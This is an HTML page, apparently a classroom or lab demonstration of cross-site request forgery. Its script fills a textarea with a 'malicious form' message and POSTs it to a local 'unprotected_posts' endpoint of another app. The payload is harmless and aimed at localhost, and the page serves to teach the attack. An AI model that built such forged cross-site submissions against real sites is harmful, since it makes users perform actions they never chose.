<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
</head>
</head>

<body>
    <nav>
        <ul>
            <li><a href="/">Home</a></li>
            <li><a href="/login">Log in</a></li>
            <li><a href="/logout">Log out</a></li>
            <li><a href="/register">Register</a></li>
            <li><a href="/welcome">Welcome</a></li>
            <li><a href="/users/posts/new">Create a post</a></li>
        </ul>
    </nav>

    <article>
        <p>Create a post Form</p>


        <script>
            function handleSubmit() {
                console.log("starting handlesubmit");
                var message = "Thank you for submitting the malicious form!";
                document.getElementById("content").value = message;
                document.getElementById("form").submit();
            }
        </script>
        <form id="form" action="http://localhost:4000/users/unprotected_posts" method="POST">
            <div>
                <label for="content">Content:</label>
                <textarea id="content" name="content" rows="10" cols="50"></textarea>
            </div>
            <button type="button" onclick="handleSubmit()">Submit</button>
        </form>
    </article>
</body>

</html>